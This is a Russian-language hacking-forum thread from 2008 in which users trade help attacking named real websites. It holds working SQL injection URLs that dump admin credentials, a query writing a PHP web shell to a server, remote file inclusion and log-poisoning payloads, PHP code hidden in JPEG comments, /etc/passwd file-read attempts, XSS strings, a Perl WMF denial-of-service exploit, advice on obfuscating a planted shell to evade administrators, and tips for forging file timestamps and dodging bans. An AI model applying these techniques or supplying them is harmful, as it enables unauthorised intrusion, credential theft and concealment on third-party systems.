_)))))) В <?php ?> наверно ;) Открываешь картинку редактором(по вкусу) и дописываешь в конец...
В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать <?php system($cmd) ?> без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.
.Begemot.
04.01.2008, 15:56
Подобрал -
http://www.rusfishing.ru/?M=133&id=0&id_=0.015+union+select+0,1,2,3+from+user/*
Хочу залить шел -
http://www.rusfishing.ru/?M=133&id=0&id_=0.015+union+select+0,'%3C?php%20system($_GET[cmd]);%20?%3E',2,3+from+user+into+outfile+'/storage/home/rusfishi/htdocs/1q2w3e.txt'/*
Не получается!
1) В заппосе что то не так или прав на зипись нету?
2) В слепой инжекции можно шел залить?
Всё правильно написано, чтолько вот 0.015 это числа или строка? Чкорее всего нет прав. Ещё перепроверь путь к записываемому файлу.
Cначала в bin2hex попробуй перевести...
1 - или прав на запись нет у пользоватлея от кторого работает мускул или папки недоступны на запись) или и то и другое
2 - можно. Разницы то никакой нет
лол
http://www.rusfishing.ru/?M=-1+union+select+0x687474703a2f2f7a69726f6461792e6e6 1726f642e72752f616e746963686174/*&id=0&id_=-0.015
в другом параметре запрос с 1 столбцом
из него выводится имя страницы и подстовляется в функцию include() на конце добовляется .php
0x687474703a2f2f7a69726f6461792e6e61726f642e72752f 616e746963686174
это переведённое в хекс http://ziroday.narod.ru/antichat
вот и всё =)
ЗЫ В папку forum есть запись
Спудер опередил...
ОФФТОП:
В странице индекс.пхп :
if ($_SERVER[REMOTE_ADDR] == '194.190.205.10' or $_SERVER[REMOTE_ADDR] == '194.87.41.11'){echo("
// <SCRIPT type='text/javascript'>
// alert('Опять ты Stan-Hunfi. Если не прекратишь, будем сыпать пургу к тебе на форум! Совет Клуба постановил, тебе сюда МУДИЛА!!!.');
// window.location='http://www.pornushka.ru';
// </SCRIPT>
// ");}
Вот это рыбаки!!! :))))))))))))
P.S ничего не дефейсить. Убью.
запрос
concat(table_schema,0x2e,table_name)+from+informat ion_schema.tables
выдает
pure-ftpd.users
как теперь вывести содержимое этой таблицы users из бд pure-ftpd? (мешает '-' ), т.к. таблица users уже есть в другой бд и запрос from+users выдает другую инфу.
Мож вот так:)?
base_decode(cHVyZS1mdHBkLnVzZXJz)
Ну ешё можно через aec decrypt\encrypt.
select omfg from pure-ftpd.users
в чём проблема?
Кузьмич, не говори х**ни
select omfg from pure-ftpd.users
в чём проблема?
Кузьмич, не говори х**ни
+from+pure-ftpd.users/*
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-ftpd.users/*' at line 1
Слип, ты сначало сам попробуй где нить имя таблицы в хекс первести и потом данные извлечь, ога? Друк Кузьмича что ли?
Блядь ты знак "?" видишь или нет? Мб мне надо скрин своего поста для тебя сделать=\
select omfg from pure-ftpd.users
в чём проблема?
Ты сам то походу не далеко ушёл=\
Наковырял инж на сайте http://www.ecoaction.com.au/, подобрал таблицы, поля, есть акк админа:
http://www.ecoaction.com.au/content.php?id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(conca t(username,';',password),0x71),0x71),5,6,7,8,9,10, 11+FROM+users/*
Вопрос значит такой: а где админка?))).
А®ТеS
http://www.ecoaction.com.au/esa
+from+pure-ftpd.users/*
Попробуй `pure-ftpd`.`users`
'`' обычно никто не экранирует, должно сработать
вы синтаксиса sql походу вообще не знаете
в запросе после from таблицу надо указывать без ковычек, так как она есть
т е select * from omfg
а не select * from 'omfg', ... `omfg`, ... 0xblablabla, ... char(11,11,11,11,11,11)
и уж самый пиздец вот это
http://forum.antichat.ru/showpost.php?p=547344&postcount=632
вы синтаксиса sql походу вообще не знаете
в запросе после from таблицу надо указывать без ковычек, так как она есть
т е select * from omfg
а не select * from 'omfg', ... `omfg`, ... 0xblablabla, ... char(11,11,11,11,11,11)
и уж самый пиздец вот это
http://forum.antichat.ru/showpost.php?p=547344&postcount=632
если ты про Noiro, то он абсолютно все правильно сказал имена таблиц поидее должны обрамляться в апострофы (обратные кавычки) именно в таких случаях это критично
остальные посты улыбнули
ога, только вот ошибочку то выдаёт
Error: Incorrect table name 'pure-ftpd.users'
Дело в том что надо указывать только имя таблицы, без имени бд в которой она находится +)
ога, только вот ошибочку то выдаёт
Error: Incorrect table name 'pure-ftpd.users'
Дело в том что надо указывать только имя таблицы, без имени бд в которой она находится +)
так надо обратныйе кавычки урл код которых %60 т.е. запрос будет:
http://site.dmn/script.php?id=1 union select 1 from %60pure-ftpd%60.users/*
и соответственно имя бд отдельно в обратные кавычки брать от .users
Ded MustD!e
05.01.2008, 16:49
впишусь пожалуй в вашу тему, причем тут кавычки, если в посте с вопросом ясно написано, что мешает "-" в "pure-ftpd.users"? и еще, ссылку кидали на сайт, или мы вслепую помогаем?
2Ded MustD!e, да не стоит вписываться, все уже давно решено, я общался с Piflit`ом по осеку и все прокатило, объясняю как я сам это все понимаю, pure-ftpd здесь воспринимается как выражение а не название таблицы т.е. есть оператор минус, поэтому ошибка и выдается, если ты пишешь `pure-ftpd`.users , то одназначно указываешь мускулу, что pure-ftpd - это имя БД а не операция
Ну вот вам пример )
http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,user_pass,3,4,5,6,7,8,9,10,11,12 ,13+from+ita-forum.itaf_user/*
при таком запросе будет ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.itaf_user/*' AND p.program_active='on' AND p.program_teacher_id=t' at line 3
А если так
http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,user_pass,3,4,5,6,7,8,9,10,11,12 ,13+from+%60ita-forum%60.itaf_user/*
мы увидим хеш
Так что Scipio абсолютно прав
http://kronverkcinema.ru/repertoire'/*
Пишет, что MySQL
Но мне сказали, что комментарий обрубается...скажи те как быть...или какие другие способы взлома))
вы синтаксиса sql походу вообще не знаете
Дело в том что надо указывать только имя таблицы, без имени бд в которой она находится +)
Base tables and views are identified by <table name>s. A <table
name> consists of a <schema name> and an <identifier>. For a per-
sistent table, the <schema name> identifies the schema in which
the base table or view identified by the <table name> was de-
fined. Base tables and views defined in different schemas can
have <identifier>s that are equal according to the General Rules
of Subclause 8.2, "<comparison predicate>".
If a reference to a <table name> does not explicitly contain a
<schema name>, then a specific <schema name> is implied. The par-
ticular <schema name> associated with such a <table name> depends
on the context in which the <table name> appears and is governed
by the rules for <qualified name>. The default schema for <prepara-
ble statement>s that are dynamically prepared in the current SQL-
session through the execution of <prepare statement>s and <execute
immediate statement>s is initially implementation-defined but may
be changed by the use of <set schema statement>s.
:rolleyes:
Хеллоу всем =D
Вопрос такой:
сканил один сайт и он нашел такую уязвимость
Подозрение на серьезную уязвимость
Множественные уязвимости (OpenSSL)
Описание
Краткое описание
Уязвимости позволяют удаленному атакующему выполнить произвольный код в системе или вызвать отказ в обслуживании приложения.
Подробное описание
1. Уязвимость существует из-за ошибки при обработке некорректных ASN.1 структур. Удаленный атакующий с помощью специального запроса может вызвать отказ в обслуживании приложения. Уязвимости подвержены все приложения использующие библиотеку OpenSSL для обработки ASN.1 данных.
Выпуски OpenSSL до версии 0.9.7 не содержат данную уязвимость.
2. Обработка публичных ключей определенного типа требует большого количества процессорного времени. Злоумышленник с помощью серии специальных запросов может вызвать отказ в обслуживании приложения.
3. Уязвимость переполнения буфера в функции "SSL_get_shared_ciphers()". Злоумышленник может отослать уязвимому приложению SSL запрос содержащий специальным образом сформированный список шифров, при обработке которых функцией "SSL_get_shared_ciphers()" произойдет переполнение буфера. Данная уязвимость при определенных обстоятельствах может быть использована атакующим для выполнения произвольного кода в системе.
4. Уязвимость существует в клиентских процедурах отвечающих за обработку SSLv2. Данная уязвимость может быть использована только для проведения DoS-атак направленных на клиентские приложения использующие уязвимую библиотеку OpenSSL.
Потенциально уязвимостям подвержены все приложения использующие уязвимую библиотеку OpenSSL.
Уязвимые версии
OpenSSL версии 0.9.7k и предыдущие
OpenSSL версии 0.9.8c и предыдущие
Использование уязвимости
Использование уязвимости удаленно: да
Использование уязвимости локально: да
Базовая оценка по системе CVSS
CVSS Base Score: 8
(AV:R/AC:L/Au:NR/C:P/I:P/A:C/B:N)
Ложные срабатывания (False Positives)
Вывод о наличии уязвимости сделан на основе версии по результатам идентификации сервисов и приложений на сканируемом узле. Если при установке обновления номер версии не менялся, возможно ложное обнаружение уязвимости.
Пропуск уязвимости (False Negatives)
Случаев пропуска уязвимости зарегистрировано не было. Причины возможных пропусков неизвестны.
и еще
Подозрение на уязвимость
DoS-атака (OpenSSL)
Описание
Обнаружено несколько уязвимостей в OpenSSL.
1. Обнаружена уязвимость нулевого указателя в функции do_change_cipher_spec(). Удаленный атакующий может послать серверу специально сформированное SSL/TLS рукопожатие (handshake), что заставит OpenSSL аварийно завершить работу.
2. Уязвимость обнаружена в SSL/TLS handshakes при включенном Kerberos шифровании. Удаленный атакующий может аварийно завершить работу службы.
3. OpenSSL некорректно обрабатывает неизвестные типы сообщений. Удаленный атакующий может специальным образом вызвать отказ в обслуживании.
Уязвимые версии:
OpenSSL Project OpenSSL 0.9.6 k
OpenSSL Project OpenSSL 0.9.6 j
OpenSSL Project OpenSSL 0.9.6 i
OpenSSL Project OpenSSL 0.9.6 h
OpenSSL Project OpenSSL 0.9.6 g
OpenSSL Project OpenSSL 0.9.6 f
OpenSSL Project OpenSSL 0.9.6 e
OpenSSL Project OpenSSL 0.9.6 d
OpenSSL Project OpenSSL 0.9.6 c
OpenSSL Project OpenSSL 0.9.7 c
OpenSSL Project OpenSSL 0.9.7 beta3
OpenSSL Project OpenSSL 0.9.7 beta2
OpenSSL Project OpenSSL 0.9.7 beta1
OpenSSL Project OpenSSL 0.9.7 b
OpenSSL Project OpenSSL 0.9.7 a
OpenSSL Project OpenSSL 0.9.7
можно ли чем либо грохнуть попробывать?
Посовтеуйте, что вы об этом думаете.
/* можно заменить на %2f%2a , но в данном случае это вроде ничего не даёт.
/* можно заменить на %2f%2a , но в данном случае это вроде ничего не даёт.
ну ты извращенец... не знаю что ты хочешь сделать но гг вообще то есть пара других способов начать комментарий...
К примеру два тире подряд --
К примеру два тире подряд --
Ты уверен, что для mysql сервера прокатит? Мой пост был адресован сюда (https://forum.antichat.ru/showpost.php?p=549357&postcount=648).
Ты уверен, что для mysql сервера прокатит? Мой пост был адресован сюда (https://forum.antichat.ru/showpost.php?p=549357&postcount=648).
Уверен
.Begemot.
07.01.2008, 15:35
Для меня остается не понятной одна весЧь.
http://www.mxftk.com/pub/page.php?id=-47
id=-47 - показывает главную страницу
id=47+order+by+10000/* - страницу отображает правильно.
Внимание! Впрос:) Можно ли както подобрать количество столбцов?
trumps, там нет инъекции.
.Begemot.
07.01.2008, 15:38
trumps, там нет инъекции.
Понятно :( . Спасибо.
Возник вопрос ...
У меня есть cookies ... есть ли вариант сделать с ними что-нибудь , кроме как извлечение временной сессии?
Возник вопрос ...
У меня есть cookies ... есть ли вариант сделать с ними что-нибудь , кроме как извлечение временной сессии?
Смотря что в них кроме сессии есть.
.Begemot.
07.01.2008, 23:30
Возник вопрос ...
У меня есть cookies ... есть ли вариант сделать с ними что-нибудь , кроме как извлечение временной сессии?
Что-нибудь, сделать можно). Это зависит от того кто дал тебе куки(какой двиг,форум).
Значит содержание cookies может быть различным в зависимости от форума? Если можно чуток по подробнее об этом.
Куки сдержат временную информацию, которую оставляет у тебя на компе форум/сайт/вообще скрипт. Это может быть:
пароль
логин
сессия
счетчик посещений
и всё что угодно остальное :)
С каким софтом происходит извлечение? (Cookie Editor?? )
http://www.redakteur-cup.de/_error.php?error=You+have+an+error+in+your+SQL+syn tax%3B+check+the+manual+that+corresponds+to+your+M ySQL+server+version+for+the+right+syntax+to+use+ne ar+%2778.37.211.6%27+LIMIT+1%27+at+line+1%3Cbr+%2F %3E%3Cbr+%2F%3E%27UPDATE+mdl_counter_ip+SET+ip_las t_action+%3D+%271199739254%27%2C+ip_last_page+%3D+ %27news.php%3Fn%3D22%27%27%2C+ip_user_id+%3D+%27%2 7+WHERE+ip_ip+%3D+%2778.37.211.6%27+LIMIT+1%27&redirect=news.php
Что с этим делать?
С каким софтом происходит извлечение? (Cookie Editor?? )
Что за извлечение??? Откуда куда?
В броузерах есть редактор куков(по крайней мере в опере и огнелисе точно).
Что за извлечение??? Откуда куда?
В броузерах есть редактор куков(по крайней мере в опере и огнелисе точно).
в осле нет
NilsonUA
08.01.2008, 12:17
Вобщем проблема с раскрытием скули в логине
есть сайт http/site/login.php
Поля мыло и пасс. Реагируют на кавычку обычную в логине, но как дальше быть? Пишет про некорректный запрос и все!
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select 0x78617861'' at line 1
select osc_email_addr from osc_activation where osc_activation=0 and osc_email_addr=''select 0x78617861'
[TEP STOP]
хэлп плз
введи:
'/**/union/**/select/**/'xaxa
а лучше:
'/**/union/**/select/**/1/*
NilsonUA
08.01.2008, 18:02
введи:
'/**/union/**/select/**/'xaxa
а лучше:
'/**/union/**/select/**/1/*
донт ворк, пишет просто неверный логин.
папка /includes/ открыта для просмотра...
есть имена всех таблиц, больше принципе нечего не накпал.
Те кто хочет быть помочь стукайте а асику, все что поимеем поделим(это гейм шоп)
Всем превед,нашёл тот сайтег прикольный гг))
При скане нашёл такую бадягу- XSS через HTTP:P.
По дефолтовскому коду дали пример:
GET /SITE HTTP/1.1
Host: ivbgj<xscript>XSS</xscript>.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive
P.S.:
SITE- хост разумееца : )
Переделал и отправил:
GET /index.html HTTP/1.1
Host: SITE<xscript>alert('XSS');</xscript>.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive
Серв либо отвечает,либо,если чё переделать слегка, выходит,что вообще молчание:Р
Расскажите, что я сделал(или нахимичил хз),а всё никаг.В подробности уязвимости был дан дефолтовский код.
P.S. Юзил перехватичик+отправщег пакетофф с сайта)(( (Хотя... в HTTP йа нупище,стараюсь=___=).
blackybr
10.01.2008, 01:28
GET /index.html HTTP/1.1
Host: SITE<xscript>alert('XSS');</xscript>.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive
ты отправляешь в никуда
Он отправляет на сайт SITE<xscript>alert('XSS');</xscript>.ru и запрашивает index.html =\
Помогите чем можете.
Есть сайт, на нем скуль инъекция.
site.ru/news.php?id=-1+union+select+1,2,333,444,5,6,7,8,9,10/*
выводятся столбцы 3 и 4
делаю так site.ru/news.php?id=-1+union+select+1,2,load_file('some_file'),444,5,6, 7,8,9,10/* - вылетает ошибка
делаю site.ru/news.php?id=-1+union+select+1,2,load_file(char(тут числа)),444,5,6,7,8,9,10/* - пустота, т.е. никаких ошибок не вылетает, просто вместо столбца 3 пустота ( в чем гемор ??
доступа к information_schema нет
на сайте нет форумов, нашел админку site.ru/admin/ , там доступ закрыт через .htacces
что посоветуете господа ?
big_BRAT
10.01.2008, 14:30
это нормально, у пользователя mysql нет прав на чтение файлов. А ошибку выкидывает потомы что фильтруется кавычка.
что делать - подбирать таблицу с пользователями и надеятся что пароли подойдут к админке, а лучше ссылку на сайт
ну это совсем не фактload_file(char(тут числа))смотря каие там "тут числа", мож файла такого просто не существует, timlame, попробуй:
site.ru/news.php?id=-1+union+select+1,2,load_file(0x2F6574632F706173737 764),444,5,6,7,8,9,10/*
если не увидишь ничего, то или ось винда или файловых привилегий нет скорее второе
т.е. в случае отсутствия файла load_file() возвращает пустую строчку ?
и в случае отсутствия файла и в случае если нет файловых привилегий
ошибка возникает тогда, когда ты в load_file() (при наличии file_priv) передал только имя не существующей директории
вместо сайт пусь буит www.debilko.ru
знач,как я понял,должно быть так:
GET /index.html HTTP/1.1
Host: debilko<xscript>alert('XSS');</xscript>.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive
йа пробывал и гет и пост. Вообще скажите, код то можно внедрить ?)
GET /index.html HTTP/1.1
Host: debilko.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive
так должно быть. А ты вообще что хочешь сделать? Почитай про синтаксис http 1.0. Думаю, поймешь, че за чушь написал.
я хотел через HTTP внедрить на хтмл сайт XSS :P
Я знаю шо твой запрос пральный,ток xspider написал какуюто Г.мол бага есь и запрос)
И ещё вопрос. пробывал тут sql- запросы на qwerty.ru
http://qwerty.ru/news.php?id=9999997999+select+union+null,null
Если он выдаёт при таком запросе список всех тем,и при ID=1+1; 2+1 не реагирует- баги нету?
P.S. на запрос or 1=1 выдаёт список всех тем,найденных на серве(без кавычек).С кавычками ашиппко... Рассудите меня :Р
я хотел через HTTP внедрить на хтмл сайт XSS :P
Я знаю шо твой запрос пральный,ток xspider написал какуюто Г.мол бага есь и запрос)
Какую-то хрень твой спайдер написал =) Чтобы внедрить js-код, надо в параметрах, которые используются скриптом передать в качестве значения js-код. host не является таким параметром. Им может являться refferer или user-agent или другие параметры, кот. используются непосредственно в скрипте.
Welemir, нету там инъекции...
жалось то какая)) пасиб шоп помогли.буду искать на досуге уязвимые страницы для тестоф)
http://www.dukemednews.org/news/article.php?id=10059+union+select+1,2,3,4,5,6,7,8, 9,10,11,12/*
Народ,объясните кто-нибудь,как подобрать здесь количество столбцов и строк(как было написано).Подбирал строки- пишет ошибки какие-то.Подбирал ещё запросом -10059+order+by+10000,куча ошибок. Чем меньше число после by,тем меньше ошибок,но толку нет.(какое макс количество полей может быть я хз)).
Вазможно ли как либо пробиться., у нас на провайдаре есть внутринный ресурс all.gs.uz
там выставляют разные новасти из за канфликта по однаму вапросу с админом сайта, на вход в этот сайт по локальной сети меня заблакировали до 23 января и типерь когда я пытаюсь зайти по локальной сети пишет что нельзя зяйти
big_BRAT
11.01.2008, 12:17
Смотря по чём тебя забанили
1. Логин
2. IP and/or MAC
Первое решается ну очень просто, хотя я думаю что тебя банили по второму, так как ты в локалке то я думаю есть вариант со сменой ИП, если такой возможности нет но оч. хочется, то как вариант можешь договорится с другом и поставить у него прокси, и ходить через него.
пс: если друг вдруг станит не_друг, то заодно сможешь за его счет ходить в инет)))
Fatal error: main(): Failed opening required 'articles/000117 union select null,null/*/text.htm' (include_path='.:/usr/local/share/pear')
Кто-нить знает,чё за ошибка такая? бадяга то точно есь: ))(чето пропуть пишет)
это инклуд или читалка файлов.
попробуй вместо "union select null,null/*" подставить "../../../../../../../../etc/passwd%00"
и почитай статьи на эту тему
http://www.paintball.ru/next.php?id=19+union+select+0,1,2+from+mysql.pb_ta ble/*
P.S. пробывал users,user---не катит.Или в запросе ошибка,или он блочит от него всё.Но бадяга же должна быть)(
__________________________________________________ _______________________
http://www.happyland-drink.ru/brands.php?id=2+union+select+0,1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28/*
Та же бредятина--- больше одного поля-ошибка в селекте,меньше на один,тоже ошибка.Знач,прально.И при выборе всей этой байды не показывается ничего: )
BlackCats
12.01.2008, 03:36
http://www.paintball.ru/next.php?id=19+union+select+0,1,2+from+mysql.pb_ta ble/*
P.S. пробывал users,user---не катит.Или в запросе ошибка,или он блочит от него всё.Но бадяга же должна быть)(
невоткнул где вывод, но есть схема таблес:
http://www.paintball.ru/next.php?id=19+union+select+0,1,2+from+information _schema.tables/*
http://www.happyland-drink.ru/brands.php?id=2+union+select+0,1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28/*
Та же бредятина--- больше одного поля-ошибка в селекте,меньше на один,тоже ошибка.Знач,прально.И при выборе всей этой байды не показывается ничего: )
надо просто было подставить нге существующий id.
вот: 4твёртая версия, дальше уж подбирай.
http://www.happyland-drink.ru/brands.php?id=-2+union+select+0,version(),2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,%2027, 28/*
Basurman
12.01.2008, 03:42
http://www.paintball.ru/next.php?id=19+or+1=1
там где чувак с ружом
это инклуд или читалка файлов.
попробуй вместо "union select null,null/*" подставить "../../../../../../../../etc/passwd%00"
и почитай статьи на эту тему
Можешь ссылку дать,а то я чет не нахожу)(наверн потому,что спать хчу :o )
STUDENTIK
12.01.2008, 13:22
Сильно не пинайте знатоки, лучше подскажите и научите нашел вот такое
Такой себе простенький сплоет убивающий explorer.exe.. локальный. Компилится под перлом. После компиляции создается файл *.wmf в директории. При просмотре директории с этим файлом ехплорер зависает...
Вот код:
#!/usr/bin/perl
print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x 61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x 00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x 00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";
# milw0rm.com
научите как правильно его запустить и можно ли сделать чтоб он сам запускался?
guest3297
12.01.2008, 14:10
юзай мета сплойт.
выбирай шелкод, генерируй сплойт и работай в разделе статьи есть на эту тему.
Lesnoy_chelovek
12.01.2008, 14:23
STUDENTIK
Для начала поставь сеье Perl. Потом просо в командной строке пиши perl путь_до_скрипта
А вообще поставб себе локальный сервер, типа Denwer - пригодится.
Здравствуйте! :)
Подскажите, как обойти фильтрацию двойных точек в относительном пути:
есть php-код (upload.php редактора fckeditor):
$sCurrentFolder = $_GET['CurrentFolder'] ;
if ( strpos( $sCurrentFolder, '..' ) ) SendError( 102, "" ) ;
где CurrentFolder хочу поставить '../../../' вместо '/'
Спасибо! :)
Смотря по чём тебя забанили
1. Логин
2. IP and/or MAC
Первое решается ну очень просто, хотя я думаю что тебя банили по второму, так как ты в локалке то я думаю есть вариант со сменой ИП, если такой возможности нет но оч. хочется, то как вариант можешь договорится с другом и поставить у него прокси, и ходить через него.
пс: если друг вдруг станит не_друг, то заодно сможешь за его счет ходить в инет)))
Прошу прощения что так долго не писал политела Winda, пришлось переустонавливать
а как можно понять почему меня забанили., попробовал подключится по другому кампу из локалки тоже не получилось и выводится во это сообщения
Ваш аккаунт на сайте заблокирован:
Ваша учетная запись на сайте была заблокирована администратором. При этом были указаны следующие причины:
Ваш IP адрес или подсеть были заблокированы администратором
За не корректное поведение на портале
Срок окончания блокировки: 21 янв 2008 14:30
Это полностью автоматический процесс блокировки и от вас не требуется ничего делать для его ускорения или прекращения.
Не в тот раздел...
Если забанен по ip, то заходи через прокси или анонимайзер.
guest3297
13.01.2008, 12:01
Macro
Они не банят по ip.
beng217
Обратись в службу поддержки вм предварительно прочитав договор.
Залил с99madshell на сервер. Linux, Apache2.
Там есть папка, в которой access denied, если через командную строку броузера запускать php файлы, а через шелл я в ту папку зайти могу.
Скажите, как можно, используя шелл, сделать возможность исполнять эти файлы из той папки в броузере?
И ещё вопрос: как поменять через c99madshell время последнего изменения файла?
Спасибо! :)
Скажите, как можно, используя шелл, сделать возможность исполнять эти файлы из той папки в броузере?
Ищи в этой папке файл .htaccess , как найдёшь - выложи сюда содержимое(:
И ещё вопрос: как поменять через c99madshell время последнего изменения файла?
touch -t 200801131341 FILE.PHP
2008 - year
01 - month
13 - day
1341 - H:M
Есть такая трабла, Mysql injection срабатывает после POST запроса и выдает следующее
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' and b.science_category_id=1 and b.science_pubdate=1) inner join udb_science_c' at line 1
можно ли здесь что либо подобрать или нахимичить ??
Тебе поможет фальсификатор пакетов InetCrack v1.39
Вот юзай наздаровье.... --> http://webfile.ru/1681376
Тебе поможет фальсификатор пакетов InetCrack v1.39 Вот юзай наздаровье.... --> http://webfile.ru/1681376
ето я то знаю как запрос послать, проблема не в етом, я иммел ввиду, что можно ли тут подобрать количество колонок или нельзя ?? ну тоесть стандартным методом тут надо работать или как ??
Ищи в этой папке файл .htaccess , как найдёшь - выложи сюда содержимое(:
нет в этой папке такого файла :(
']Macro
Они не банят по ip.
beng217
Обратись в службу поддержки вм предварительно прочитав договор.
А есть ещё какой либо спосаб, если да то можете кинуть ссылку кде описывается как это можно сделать (я впервые сталкнулся с проблемой с IP)
Через анонимайзер и прокси не палучится т.к. я хочу зайти по лакальной сети т.к. это внутриний ресурс а через интернет зайти скйчас тоже можно
Помогите вот с этим :
MySQL error : You have an error in your SQL syntax near ''A variable type check failed, expecting G/INT for \"s\" : 20\' - /index.php?zh=' at line 1
URL: http://www.nu-44.ru/index.php?zh=topics&s=20'
и что можно получить из этого по максимуму.... тока не ломайте его он мне нужен рабочим плизззз
там фильтрация стоит навряд-ли, что можно сделать
Хорошо а тогда что мона с этим сделать???
_http://shop.winm.ru/index.php?productID=262'
ошибка:
You have an error in your SQL syntax near ''262''' at line 1 SQL query : SELECT categoryID FROM SS_products WHERE productID='262''
на тебе XSS'ку
http://shop.winm.ru/index.php?searchstring=%22%3E%3Cscript%3Ealert%28% 22XSS%22%29%3C%2Fscript%3E%3Cp+aling%22&x=0&y=0
На кой мне XSS я их итак тама сотними понаходил..... я же сказал мне надо сделать sql-inject
на тебе XSS'ку
http://shop.winm.ru/index.php?searchstring=%22%3E%3Cscript%3Ealert%28% 22XSS%22%29%3C%2Fscript%3E%3Cp+aling%22&x=0&y=0
темболее это именна та которую самой первой нашел после 5 минут на сайте.... я ж написал подскажите проявите себя нужна sql-инъекция
Народ как использовать данные уязвимости -
http://www.planeta.ua/fc/template.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
Если можно то по подробней пожалуйста !
Спасибо !
там кодес типа
...
include($_GET['filename']);
...
посему те надо наследить в логах (например с юзер-агентом <? system($_GET[cmd]);?> ) и потом их проинклудить
удалённый инклуд не катит ибо так настроен сервер
http://www.planeta.ua/fc/template.php?filename=http://toxa.nov.ru/z.txt
посему те надо наследить в логах (например с юзер-агентом <? system($_GET[cmd]);?> ) и потом их проинклудить можно по подробней пожалуйста ! или где об этом можно почитать ?
http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'+GROUP+BY+1--
Вот эта инъёкция какая то странная... никак не могу врубится, почему не работают union, group by, и т.п., хотя через ; запросы выполняются
blackybr
16.01.2008, 13:38
неправда, селект работает http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'%20or%201=(select%20 1)--
Здравствуйте! :)
Подскажите, как можно закодировать .php файл с шеллом, чтобы сервер его исполнял, а админ не смог бы найти по названию функций и прочему тексту этот файл через поиск файлов в каталоге.
желательно, чтобы по словам eval(gzinflate(base64_decode(' он тоже не нашел этот файл.
Linux, Apache2
софт типа Zend Optimiser не стоит.
Спасибо! :)
собираешь код @include($_REQUEST[m]); в переменную в несколько этапов, разбросанных под коду и пропускаешь через preg_replace с модификатором e
пчочему то ругается на union просто на select и тому подобное...
http://shop.winm.ru/index.php?productID=262'
этот магазин не работает уже 2 года а сайт остался... я на нем тренируюсь он дырявый xss я нашел много теперь нашел ошибку в sql но немогу ее использовать...
Причем как то странно LIMIT работает: ( http://shop.winm.ru/index.php?productID=353+or+15+limit+3 ) а вот остально нет...
и еще один вопросик phpbb можно взломать не зарегистрировавшись??? а то тоже для жксперементов нашел не администрируемый и мертвый форум последнее обновление в 2005 г и там регистрация только с подтверждения админа... можно его както взломать?
могу адрес дать....
я тебя немного не понял можешь обьяснить..... я понял то что нет инъекции но на будующее что значит в 3 ветки?
Basurman
17.01.2008, 03:29
в 3-ей ветке нет оператора union
можешь benchmark использовать...
http://localhost/test.php?id=1-benchmark(1000000,benchamrk(1000000, md5(current_time))), или
http://localhost/test2.php?order=(benchmark(1000000,benchamrk(10000 00, md5(current_time))))
Тупо вешает сервак (работает на 3-ке)
в 3-ей ветке нет оператора union
можешь benchmark использовать...
это как??? в первый раз слышу мне аж стыдно стало.... :(
обьясни пожайлуста...
я имею ввиду как benchmark использовать.... :confused: или ссылку дай где прочитать мона.... эсли не затруднит....
в 3-ей ветке нет оператора union
можешь benchmark использовать...
нуну, там ещё как бы подзапросов нет =\
нуну, там ещё как бы подзапросов нет =\
тоесть вообще ни как нельзя провести иньекцию???? :eek:
KIR@PRO, ознакомтесь
http://www.securitylab.ru/contest/212101.php
чего это такое?
hip-hop.ru/forum/ban.php?by=order%20by%201--
